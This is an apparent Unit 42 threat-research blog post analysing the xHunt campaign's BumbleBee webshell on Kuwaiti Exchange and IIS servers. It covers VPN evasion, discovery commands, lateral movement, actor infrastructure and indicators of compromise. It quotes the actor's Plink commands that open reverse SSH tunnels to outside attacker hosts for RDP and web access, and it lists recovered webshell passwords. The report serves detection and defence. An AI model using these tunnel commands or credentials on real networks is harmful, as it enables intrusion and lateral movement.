[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/bumblebee-webshell-xhunt-campaign/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 25 min read  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/ "Advanced DNS Security")[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/product-category/advanced-threat-prevention/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/product-category/next-generation-firewall/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:January 11, 2021

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [BumbleBee](https://unit42.paloaltonetworks.com/tag/bumblebee/)
  * [Remote desktop](https://unit42.paloaltonetworks.com/tag/remote-desktop/)
  * [Webshell](https://unit42.paloaltonetworks.com/tag/webshell/)
  * [XHunt](https://unit42.paloaltonetworks.com/tag/xhunt/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/?pdf=download&lg=en&_wpnonce=40dbae5d0f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/?pdf=print&lg=en&_wpnonce=40dbae5d0f "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=xHunt%20Campaign:%20New%20BumbleBee%20Webshell%20and%20SSH%20Tunnels%20Used%20for%20Lateral%20Movement&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F&title=xHunt%20Campaign:%20New%20BumbleBee%20Webshell%20and%20SSH%20Tunnels%20Used%20for%20Lateral%20Movement "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F&text=xHunt%20Campaign:%20New%20BumbleBee%20Webshell%20and%20SSH%20Tunnels%20Used%20for%20Lateral%20Movement "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=xHunt%20Campaign:%20New%20BumbleBee%20Webshell%20and%20SSH%20Tunnels%20Used%20for%20Lateral%20Movement%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fbumblebee-webshell-xhunt-campaign%2F "Share in Mastodon")

## Executive Summary

In September 2020, we began investigating a Microsoft Exchange server at a Kuwaiti organization that a threat group compromised as part of a continued xHunt campaign. This investigation resulted in the [discovery of two new backdoors](https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/) called TriFive and Snugy, which we discussed in a prior blog, as well as a new webshell that we call BumbleBee that we will explain in greater detail in this blog. We use this name because the color scheme of the BumbleBee webshell includes white, black and yellow, as seen in Figure 1.

The actor used the BumbleBee webshell to upload and download files to and from the compromised Exchange server, but more importantly, to run commands that the actor used to discover additional systems and to move laterally to other servers on the network. We found BumbleBee hosted on an internal Internet Information Services (IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web servers at two other Kuwaiti organizations. As mentioned in our [prior xHunt Campaign blog](https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/), we still do not know the initial infection vector used to compromise the Exchange server, as this appears to have occurred prior to the logs we were able to collect.

We observed the actor interacting directly with the BumbleBee webshell on the compromised Exchange server of the Kuwaiti organization, as this server was accessible from the internet. The actor used Virtual Private Networks (VPNs) provided by Private Internet Access when directly accessing BumbleBee on internet-accessible servers. The actor would frequently switch between different VPN servers to change the external IP address of the activity that the server would store in the logs. Specifically, the actor changed the IP address to appear to be from different countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden and the United Kingdom. We believe this is an attempt to evade detection and make analysis of the malicious activities more difficult. We also observed the actor switching between different operating systems and browsers, specifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems. This suggests the actor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are multiple actors involved, who have differing preferences for operating systems and browsers.

In addition to using VPNs, the actor used SSH tunnels to interact with BumbleBee webshells hosted on internal IIS web servers that are not accessible directly from the internet at all three Kuwaiti organizations. The commands executed on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH tunnels to access services internal to the compromised network. We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP). We also observed the actor creating SSH tunnels to internal servers for TCP port 80, which suggests the actor used the tunnel to access internal IIS web servers. We believe that the actor accessed these additional internal IIS web servers to leverage file uploading functionality in internal web applications to install BumbleBee as a method of lateral movement.

Palo Alto Networks [Next-Generation Firewall](https://www.paloaltonetworks.com/network-security/next-generation-firewall) customers are protected from these xHunt-related attacks with [Threat Prevention](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention), [URL Filtering](https://www.paloaltonetworks.com/products/threat-detection-and-prevention/web-security) and [DNS Security](https://www.paloaltonetworks.com/products/threat-detection-and-prevention/dns-security) subscriptions.

## BumbleBee Webshell

The threat group involved in the xHunt campaign compromised an Exchange server at a Kuwaiti organization and installed a webshell that we call BumbleBee. We call the webshell BumbleBee because the color scheme of the webshell includes white, black and yellow, as seen in Figure 1. BumbleBee is pretty straightforward. It allows an attacker to execute commands and upload and download files to and from the server. The interesting part of BumbleBee is that it requires an actor to supply one password to view the webshell and a second password to interact with the webshell.
![We gave the BumbleBee webshell its name because of the black, white and yellow color scheme shown here. This shows the interface an actor from the xHunt campaign would use to run commands on Microsoft Exchange Server.](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-42.png) Figure 1. BumbleBee webshell used by xHunt actor to run commands on Microsoft Exchange Server.

To view the BumbleBee webshell, the actor must provide a password in a URL parameter named parameter. Otherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied password for authentication, the webshell will generate an MD5 hash of the parameter value and check it with a hardcoded MD5 hash, which in the BumbleBee sample hosted on the compromised Exchange server we observed was an MD5 hash of 1B2F81BD2D39E60F1E1AD05DD3BF9F56 for the password string fkeYMvKUQlA5asR. Once displayed, BumbleBee provides the actor three main functionalities:

1. Executing commands via cmd /c
2. Uploading files to the server to a specified folder (c:\\windows\\temp by default).
3. Download files from the server.

To carry out any of these functions, the actor must supply a second password (in the field with the added "password" label in Figure 1). The BumbleBee webshell will generate an MD5 hash of the password and check it with a hardcoded MD5 hash before carrying out the functionality. The MD5 hash checked prior to carrying out the actor's desired actions was 36252C6C2F616C5664A54058F33EF463, but we were unfortunately unable to determine the string form of this password. While we did not know the password required to use BumbleBee's functionality, we were able to determine the commands executed via the webshell by analyzing logs from the compromised Exchange server, which we will discuss in detail in a later section of this blog.

While carrying out our analysis, we found a second BumbleBee webshell that contained different MD5 hashes for viewing the webshell and executing commands, which were A2B4D934D394B54672EA10CA8A65C198 and 28D968F26028D956E6F1199092A1C408, respectively. We determined that the hash of A2B4D934D394B54672EA10CA8A65C198 was for the password TshuYoOARg3fndI, but we were unable to determine the string for the second hash. This webshell was hosted at an internal IIS web server at the same Kuwaiti organization where the original BumbleBee was found on a compromised Exchange server. We also found this specific BumbleBee sample hosted on internal IIS web servers at two other organizations in Kuwait. We were able to collect endpoint logs from an internal IIS web server at one of the two Kuwaiti organizations to determine the commands executed via BumbleBee, which we will also discuss in a later section of this blog.

## Interactions With Compromised Microsoft Exchange Server

To determine the actor's activities regarding the compromised Exchange server of a Kuwaiti organization, we collected IIS server logs from the Exchange server and the logs generated for the system by Cortex XDR. Within the IIS logs, we were able to observe the HTTP POST requests generated when the actor issued commands via the BumbleBee webshell installed on the compromised Exchange server. Using the IIS logs, we were also able to observe the actor logging into a compromised email account via Outlook Web App and carrying out specific activities once logged in, such as viewing emails and searching for other email accounts on the compromised network.

Unfortunately, the compromised Exchange server cannot log the data within the POST requests, so while we know how many commands were issued from these logs, we do not know the actual commands that the actor executed. Also, we were only able to collect 34 days' worth of logs from the period between Jan. 31, 2020, and Sept. 16, 2020, which did not include all the IIS logs from the compromised Exchange server. Due to these large gaps in logs, we do not have a complete picture of the activity or even visibility into the beginning of the actor's interactions with the compromised Exchange server. For example, the IIS logs show the first BumbleBee webshell activity on Feb. 1, 2020, but they also show the TriFive backdoor logging into a compromised email account every five minutes starting at 12:02 AM UTC on Jan. 31, 2020. The TriFive beacons every five minutes suggest it was repeatedly running via the scheduled task discussed in our [previous blog on the backdoors related to this incident](https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/), which also suggests that the actor had already gained sustained access to the compromised Exchange server before what our collected logs show.

Using the IIS logs we were able to collect from the compromised Exchange server, we were able to put together a timeline of the actor's activity, including interactions with the BumbleBee webshell. On Feb. 1 and July 27, 2020, the actor logged into the Exchange server via Outlook Web App using compromised credentials. The actor used the search functionality within Outlook Web App to search for email addresses, including searching for the domain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific keywords, such as helpdesk. We also saw the actor viewing emails in the compromised account's inbox, specifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails from a Symantec product and Fortinet's FortiWeb product. The act of searching for emails to the helpdesk and viewing security alert emails suggests that the threat actor was interested in determining whether the Kuwaiti organization had become aware of the malicious activities.

In regard to the BumbleBee webshell activity, the important pieces of information in the IIS logs used to generate a timeline were:

* Timestamp of the HTTP requests.
* Actor's IP address.
* User-agent in HTTP request provides the actor's operating system and browser version.
* ClientId in the URL parameters is a unique identifier for the client provided by the Exchange server via a server-side cookie.

Table 1 in the Appendix provides the timeline of activity regarding the actor's use of the BumbleBee webshell, which began on Feb. 1, 2020, according to the logs we were able to collect. While creating this timeline, we noticed a few interesting observables and behaviors exhibited by the actor when interacting with BumbleBee, including:

* All but one of the IP addresses used by the actor are associated with a VPN provided by Private Internet Access, with the other IP address belonging to FalcoVPN.
* The actor switched between VPN servers in different locations to change IP address and to appear to originate from different countries, specifically Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden and the United Kingdom.
* The actor used a combination of operating systems and browsers when interacting with BumbleBee, specifically FireFox ( ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-43.png) ) or Chrome ( ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-44.png) ) on Windows 10 ( ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-45.png) ), Windows 8.1 ( ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-46.png) ) or Linux systems ( ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-47.png) ).

## Commands Executed via BumbleBee

As we previously mentioned, the compromised Exchange server of a Kuwaiti organization does not log the POST data within the IIS logs, so we were unable to extract the commands run on the BumbleBee webshell. However, we used overlapping timestamps to correlate the activity in the IIS logs with the command prompt activity seen in Cortex XDR logs to determine the commands executed on the server. Unfortunately, we did not have visibility into the commands executed on BumbleBee until Sept. 16, 2020, when Cortex XDR was installed on the compromised Exchange server in response to the suspicious activity. We were also able to determine the commands run on the BumbleBee webshell hosted on the internal IIS web server at one of the two other Kuwaiti organizations as well.

Based on the Cortex XDR logs, the actor spent three hours and 37 minutes on Sept. 16, 2020, running commands via the BumbleBee webshell installed on the compromised Exchange server. Table 2 in the Appendix shows all the commands and the MITRE ATT\&CK technique identifiers that best describe the activities carried out. The commands show the actor:

1. Performing network discovery ([T1018](https://attack.mitre.org/techniques/T1018/)) using ping and net group commands, as well as PowerShell ([T1059.001](https://attack.mitre.org/techniques/T1059/001/)), to find additional computers on the network.
2. Performing account discovery ([T1087](https://attack.mitre.org/techniques/T1087/)) using the whoami and quser commands.
3. Determining the system time ([T1124](https://attack.mitre.org/techniques/T1124/)) using the W32tm and time commands.
4. Creating an SSH tunnel ([T1572](https://attack.mitre.org/techniques/T1572/)) using Plink (RTQ.exe) to a remote host.
5. Using RDP ([T1021.001](https://attack.mitre.org/techniques/T1021/001/)) over the SSH tunnel to control the compromised computer.
6. Laterally moving ([T1570](https://attack.mitre.org/techniques/T1570/)) to another system by mounting a shared folder, copying Plink (RTQ.exe) to a remote system and using Windows Management Instrumentation (WMI) ([T1047](https://attack.mitre.org/techniques/T1047/)) to create an SSH tunnel for RDP access.
7. Removing evidence of their presence by deleting ([T1070.004](https://attack.mitre.org/techniques/T1070/004/)) BumbleBee after they were done issuing commands.

The commands listed in Table 2 in the Appendix also show the actor using Plink (RTQ.exe) to create an SSH tunnel to an external IP address 192.119.110\[.\]194, as seen in the following command:

echo y | c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8081:\<redacted IP #2\>:3389 -l bor -pw 123321 -P 443

The IP address overlaps with other related infrastructure that we will discuss in a later section of this blog. Most importantly, the username and password of bor and 123321 used to create the SSH tunnel overlaps directly with prior xHunt activity. These exact credentials were listed within the [cheat sheet found within the Sakabota tool](https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/), which provided an example command that the actor could use to create SSH tunnels using Plink. We believe the actor used the example command from the cheat sheet as a basis for the commands they used to create the SSH tunnels via BumbleBee.

The actor creates these SSH tunnels to connect to non-internet accessible RDP services on the Windows system, specifically to use RDP to interact with the compromised system and to use Graphical User Interface (GUI) applications. The actor also uses these SSH tunnels to move laterally to other systems on the network, specifically to access internal systems that are not remotely accessible from the internet, as depicted in Figure 2.
![This shows how a threat actor from the xHunt campaign would use SSH tunnels to move laterally to other systems on the network, allowing access to internal systems that are not remotely accessible from the internet through the internet accessible server hosting the BumbleBee webshell.](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-48.png) Figure 2. Visualization of xHunt actor accessing an internal system from an SSH tunnel created on the internet accessible server hosting BumbleBee.

In addition to analyzing commands executed on the compromised Exchange server, we also analyzed the commands executed on the BumbleBee webshell at an internal IIS web server hosted at one of the two other Kuwaiti organizations. On Sept. 10, 2020, we found that the actor ran several commands to perform network and user account discovery. Additionally, the actor used BumbleBee to upload a second webshell with a filename of cq.aspx. The actor used this second webshell to run a PowerShell script that issued SQL queries to a Microsoft SQL Server database.

The actor first issued a SQL query to check the version of SQL server, followed by the actor issuing two additional queries that were very specific to the web application running on the IIS web server. The PowerShell script used to issue the SQL queries is very similar to scripts that were included in a Microsoft Technet forum post titled [Running SQL via PowerShell](https://social.technet.microsoft.com/Forums/ie/en-US/603af83a-8db5-48ce-b19c-74a823ebbece/running-sql-via-powershell?forum=winserverpowershell), which suggests the actor may have used this forum post as a basis for the PowerShell script. We were unable to obtain the second webshell, as the actor deleted it via the BumbleBee webshell when they were finished. Table 3 in the Appendix shows the commands executed via BumbleBee on Sept. 10, 2020.

The logs on the IIS web server hosting the BumbleBee webshell used to issue the commands in Table 3 only included internal IP addresses for the source of the activity. The internal IP addresses suggested this web server was not publicly accessible and did not expose the actor's source IP address. However, all of the attempts to access BumbleBee and run the commands in Table 3 had 192.119.110\[.\]194:8083 as the host in the URL of the referrer field within the web server logs. This external IP address in the referrer field suggests that the actor was accessing BumbleBee via an SSH tunnel. The IP address in the referrer field is also the same as in the command issued to create the SSH tunnels for RDP access that we observed on the compromised Exchange server, as shown in Table 2.

## File Uploader and SSH Tunnels

During our research, we found a second BumbleBee webshell that was hosted on an internal IIS web server at the initial Kuwaiti organization, as well as on internal IIS web servers at two other Kuwaiti organizations. This BumbleBee webshell had different passwords to view and run commands compared to the first sample we analyzed. The second BumbleBee webshell required the actor to include the password TshuYoOARg3fndI within a URL parameter aptly named parameter. As with the initial BumbleBee sample, we do not know the password the actor must include to be able to run commands on the webshell.

By analyzing artifacts on the internal IIS web server, we were able to determine that on July 16, 2020, the actor ran similar commands to create SSH tunnels using Plink as those seen in Table 2 in the Appendix. We determined the actor executed commands that use the same username and password as seen in the [xHunt cheat sheet](https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/), but with a different external IP address controlled by the actor, as in the following:

1\.exe 142.11.211\[.\]79 -C -R 0.0.0.0:8080:10.x.x.x:80 -l bor -pw 123321 -P 443  
SVROOT.exe 142.11.211\[.\]79 -C -R 0.0.0.0:8081:10.x.x.x:80 -l bor -pw 123321 -P 443

These commands differ from those used to create the SSH tunnel on the compromised Exchange server that allowed the actor to connect to the server using RDP over TCP port 3389. The commands above attempt to create a tunnel to allow the actor to access web servers hosted at other internal servers over TCP port 80. We believe the actor used these SSH tunnels to gain access to web servers on other internal networks with hopes of finding similar file uploading functionality on those servers. If found, we believe the actor would use the file uploading functionality to upload a webshell to compromise the remote server for lateral movement.

We checked the IIS logs that contained BumbleBee webshell activity and found three external IP addresses within the URLs of the referrer field of inbound HTTP requests. The presence of these IP addresses in the referrer field suggests that the actor used the SSH tunnels to access the web servers by including the following IP and TCP ports in the URL field of their browser:

142\.11.211\[.\]79:8080

142\.11.211\[.\]79:8081

91\.92.109\[.\]59:1234

91\.92.109\[.\]59:1255

91\.92.109\[.\]59:1288

91\.92.109\[.\]59:1289

192\.119.110\[.\]194:8083

## Related xHunt Infrastructure

The inbound requests to the BumbleBee webshell hosted on the compromised Exchange server did not provide any decent pivot points to other xHunt infrastructure, as all the external IP addresses were of VPN servers the actor used when interacting with the webshell. Fortunately, we were able to extract known xHunt infrastructure used as the remote servers for the SSH tunnels that the actor created to access systems via RDP and internal web services. The three external servers used for the SSH tunnels were 192.119.110\[.\]194, 142.11.211\[.\]79 and 91.92.109\[.\]59, which provided overlaps with other infrastructure seen in the chart in Figure 3.

![We were able to extract known xHunt infrastructure used as the remote servers for the SSH tunnels that the actor created to access systems via RDP and internal web services. The three external servers used for the SSH tunnels were 192.119.110\[.\]194, 142.11.211\[.\]79 and 91.92.109\[.\]59, which provided overlaps with other infrastructure seen in this chart.](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-49.png) Figure 3. Infrastructure associated with xHunt servers used for SSH tunnels. These three IP addresses used for the remote location of the SSH tunnel resolved to the domains ns1.backendloop\[.\]online and ns2.backendloop\[.\]online. More recently, these two domains have resolved to an IP address of 192.255.166\[.\]158, which may suggest that the actor is using a server at this IP address in current operations. The 91.92.109\[.\]59 IP address also resolved to various subdomains on the following domains, suggesting that they are also part of the actor's infrastructure:

backendloop\[.\]online  
bestmg\[.\]info  
windowsmicrosofte\[.\]online

The domain windowsmicrosofte\[.\]online contains the substring microsofte, which was seen in the Hisoka C2 domain of microsofte-update\[.\]com as mentioned in [our initial publication on xHunt's attacks on Kuwaiti shipping and transportation organizations](https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/). Unfortunately, we have not seen any of these domains used by the actor within our telemetry, so we cannot determine their purpose within the actor's operations.

## Conclusion

The xHunt campaign continues as the actor installed a webshell we call BumbleBee on a compromised Exchange server of a Kuwaiti organization, which we found hosted on an internal IIS web server on the same network. We also discovered BumbleBee on two internal IIS web servers at two other Kuwaiti organizations as well. While we know the actor used the file uploading functionality of a web application to install BumbleBee onto internal IIS web servers, we are still unsure if the actor installed BumbleBee on the compromised Exchange server by exploiting a vulnerability or by moving laterally from another system on the network.

The actor used BumbleBee to run commands on the compromised servers at the three Kuwaiti organizations, including commands to discover user accounts and other systems on the network, as well as commands to move laterally to other systems on the network. Additionally, the actor created SSH tunnels to access systems via RDP and to access internal web servers from external servers controlled by the actor. The actor used the same username and password for the SSH tunnels that we observed within the [cheat sheet included in the Sakabota tool](https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/), which was developed and exclusively used by the actor.

The external servers used by the actor for the SSH tunnels were seen in activity at two of the three Kuwaiti organizations, which suggests this actor reuses infrastructure when interacting with multiple target networks. These external servers also resolved to several related domains, suggesting that they are not only used to establish SSH tunnels, but used more generally for infrastructure across other portions of their operations.

From this analysis, we determined that the actor prefers to use VPNs provided by Private Internet Access when interacting directly with the targeted networks to conceal their true location. The actor would also switch VPN servers often while issuing commands on the webshell to make the activity appear to originate in many different countries. The actors also used a VPN when logging into compromised email accounts on the Exchange server of the Kuwaiti organization, in which they specifically looked for helpdesk-related emails and emails generated by security alerts. The attempts to conceal their location and the focus on viewing emails that might notify administrators of the compromised network of the attacker's presence may explain how the actor was able to maintain a presence on the compromised network for many months.

Palo Alto Networks Next-Generation Firewall customers are protected from the attacks outlined in this blog with the following security subscriptions:

* Threat Prevention signatures "BumbleBee Webshell File Detection" and "BumbleBee Webshell Command and Control Traffic Detection" detects BumbleBee webshell activity.
* Actor's related infrastructure has been categorized as malicious in URL Filtering and DNS Security.

## Additional Resources

* [xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control](https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/)
* [xHunt Campaign: New Watering Hole Identified for Credential Harvesting](https://unit42.paloaltonetworks.com/xhunt-campaign-new-watering-hole-identified-for-credential-harvesting/)
* [xHunt Campaign: xHunt Actor's Cheat Sheet](https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/)
* [xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection](https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/)
* [xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations](https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/)

## Appendix

#### **Indicators of Compromise**

142\.11.211\[.\]79  
91\.92.109\[.\]59  
192\.119.110\[.\]194  
192\.255.166\[.\]158  
backendloop\[.\]online  
bestmg\[.\]info  
windowsmicrosofte\[.\]online

#### **BumbleBee Webshell Activity on Exchange Server**

|-------------------------------------|--------------|------------------------------------------------------------------------------------------------------------|------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **Start**  **Time** **(UTC)** | **Commands** | **IP Address**                                                                                             | **Client ID**          | **OS and Browser from User Agent**                                                                                                                                            |
| 2/1/20 10:47                        | 0            | 77.243.191\[.\]20 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-50.png)    | POQSBWBKAHZLRWNZFVPG   | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-51.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-52.png)   |
| 2/1/20 11:37                        | 12           | 185.220.70\[.\]144 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-53.png)   | RCWIWFL0MCDGZKGO0A     | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-54.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-55.png)   |
| 2/1/20 12:38                        | 0            | 193.176.86\[.\]134 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-56.png)   | RCWIWFL0MCDGZKGO0A     | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-57.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-58.png)   |
| 2/1/20 12:58                        | 75           | 82.102.21\[.\]219 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-59.png)    | NCHOOJMDGUYAOWZVXJQDG  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-60.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-61.png)   |
| 6/28/20 11:09                       | 3            | 89.26.241\[.\]70 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-62.png)     | ITKVJLNUKULNR0PBAWQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-63.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-64.png)   |
| 7/25/20 7:56                        | 0            | 23.92.127\[.\]18 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-65.png)     | IJFHUUAID0FGS9YQEMHCG  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-66.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-67.png)   |
| 7/25/20 10:44                       | 15           | 196.52.84\[.\]35 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-68.png)     | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-69.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-70.png)   |
| 7/25/20 13:59                       | 7            | 196.52.84\[.\]52 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-71.png)     | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-72.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-73.png)   |
| 7/26/20 6:43                        | 3            | 185.220.70\[.\]139 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-74.png)   | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-75.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-76.png)   |
| 7/26/20 7:41                        | 4            | 185.230.127\[.\]233 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-77.png)  | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-78.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-79.png)   |
| 7/26/20 11:26                       | 5            | 185.230.127\[.\]239 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-80.png)  | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-81.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-82.png)   |
